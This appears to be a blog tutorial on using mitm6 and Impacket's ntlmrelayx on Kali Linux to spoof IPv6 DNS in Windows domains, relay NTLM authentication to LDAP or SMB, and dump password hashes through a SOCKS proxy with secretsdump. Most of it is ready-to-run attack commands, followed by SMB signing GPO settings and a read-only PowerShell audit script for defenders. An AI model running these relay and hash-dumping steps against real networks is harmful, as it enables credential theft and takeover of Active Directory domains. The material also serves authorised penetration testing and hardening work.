How to Use MITM6 on Kali Linux

Mitm6 is a penetration testing tool that targets weaknesses in how Windows networks handle IPv6. Even in environments that primarily use IPv4, Windows systems will often still listen for IPv6 traffic, and mitm6 takes advantage of this by impersonating an IPv6 router. Once a machine accepts it as a legitimate router, the attacker can redirect traffic and manipulate name resolution processes like WPAD or DNS. This allows them to capture authentication attempts, steal NTLM hashes, or relay credentials to services such as Active Directory. In essence, mitm6 enables an attacker to position themselves as a man-in-the-middle by exploiting default IPv6 behavior in Windows networks.

Impacket's ntlmrelayx is preinstalled on Kali Linux; mitm6 is not. Running the command below in a terminal triggers Kali's command-not-found handler, which offers to install the package.

mitm6

# You can also install it directly with apt.
sudo apt install mitm6

Use mitm6 to target LDAP in Kali Linux

# To make this work, run both commands in separate terminals.

sudo mitm6 -d domain-name.local

# -d is the domain, -t is the relay target, -wh is the WPAD host name to advertise, -l is the folder where loot is saved
impacket-ntlmrelayx -6 -t ldap://IP-Domain-Controller -wh fakepad.domain-name.local -l /home/kali/Desktop/lootme

Start a SOCKS Proxy in Kali Linux

# Start a SOCKS proxy. Run the commands in three separate terminals.

sudo mitm6 -d domain-name.local

impacket-ntlmrelayx -6 -socks -smb2support -t IP-Domain-Controller

# During this session, type the following in the ntlmrelayx prompt to list relayed sessions and their admin status.
socks

# Dump password hashes through the SOCKS proxy.
proxychains4 impacket-secretsdump domain-name/username@ip-address -no-pass

How to check if SMB is on

nmap -p 135,445 target_ip_address

Additional Commands

# By default, ntlmrelayx uses relayed authentication sessions to conduct attacks, but it does not save the Net-NTLMv2 hashes that it intercepts. To log and save these hashes, use the --output-file (-of) option.
ntlmrelayx --output-file <hash_filename> [options]

Additional Information

How to enable or disable SMB signing on Windows Server.

GPO – Default Domain Policy – Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options.

“Microsoft network client: Digitally sign communications (always)”.

“Microsoft network server: Digitally sign communications (always)”.

(Optional) – If SMBv1 is enabled

“Microsoft network server: Digitally sign communications (if client agrees)”.
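An added audit script, not from the original post, that reports whether the three signing settings listed above are actually enforced on a Windows host. It assumes it runs elevated on Windows Server 2012 or later, where the SmbShare module's Get-SmbServerConfiguration and Get-SmbClientConfiguration cmdlets are available; the registry paths are the values those GPO settings write.

```powershell
# Added example (not part of the original post). Reports the effective SMB
# signing configuration on the local machine so a defender can confirm the
# GPO settings above were applied before trusting the host to resist relay.

function Get-SmbSigningStatus {
    $server = Get-SmbServerConfiguration
    $client = Get-SmbClientConfiguration

    # Registry values behind the GPO entries; 1 = enabled, 0 = disabled.
    $srvKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $cliKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters'
    $srvReg = Get-ItemProperty -Path $srvKey -ErrorAction SilentlyContinue
    $cliReg = Get-ItemProperty -Path $cliKey -ErrorAction SilentlyContinue

    [PSCustomObject]@{
        # "Microsoft network server: Digitally sign communications (always)"
        ServerSignAlways          = [bool]$server.RequireSecuritySignature
        # "Microsoft network server: Digitally sign communications (if client agrees)"
        ServerSignIfClientAgrees  = [bool]$server.EnableSecuritySignature
        # "Microsoft network client: Digitally sign communications (always)"
        ClientSignAlways          = [bool]$client.RequireSecuritySignature
        ServerRegistryRequireSign = $srvReg.RequireSecuritySignature
        ClientRegistryRequireSign = $cliReg.RequireSecuritySignature
        # Only a mandatory server-side requirement makes relayed SMB logons to this host fail.
        InboundRelayBlocked       = [bool]$server.RequireSecuritySignature
    }
}

$status = Get-SmbSigningStatus
$status | Format-List

if (-not $status.InboundRelayBlocked) {
    Write-Warning 'SMB signing is not required on the server side; relayed NTLM authentication to SMB on this host would be accepted.'
}
if (-not $status.ClientSignAlways) {
    Write-Warning 'SMB client does not require signing; this host will accept unsigned sessions from servers.'
}
```

Run it on each domain controller and file server after the GPO refresh (gpupdate /force) to confirm the policy took effect rather than only being set.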
